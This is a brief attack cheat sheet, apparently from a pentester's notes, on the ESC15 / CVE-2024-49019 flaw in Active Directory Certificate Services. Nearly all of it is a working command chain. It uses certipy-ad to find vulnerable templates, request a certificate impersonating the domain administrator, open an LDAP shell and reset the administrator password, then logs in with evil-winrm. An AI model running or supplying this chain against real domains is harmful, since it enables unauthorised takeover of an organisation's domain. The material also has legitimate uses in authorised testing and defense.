ESC15

CVE-2024-49019

ESC15 works only on unpatched CAs

1.0 certipy-ad

1.1 Find Vulnerabilities

certipy-ad find -k -no-pass -vulnerable -stdout -dc-ip $ip -target $dns'.'$domain

1.2 Request Certificate

certipy-ad req -k -no-pass  \
    -dc-ip $ip -target $dns'.'$domain \
    -ca 'CA-NAME' -template 'Template' \
    -upn 'administrator@'$domain  \
    -application-policies 'Client Authentication' \
    -dc-host dc01

1.3 Authenticate and use ldap shell

certipy-ad auth -pfx administrator.pfx -domain $domain -dc-ip $ip -ldap-shell
 
ldap> change_password administrator adm!123

1.4 Profit

evil-winrm -i $ip -u administrator -p 'adm!123'

References

ly4k/Certipy

hckhsn

Explorer

ESC15

ESC15

1.0 certipy-ad

1.1 Find Vulnerabilities

1.2 Request Certificate

1.3 Authenticate and use ldap shell

1.4 Profit

References

Graphansicht

Inhaltsverzeichnis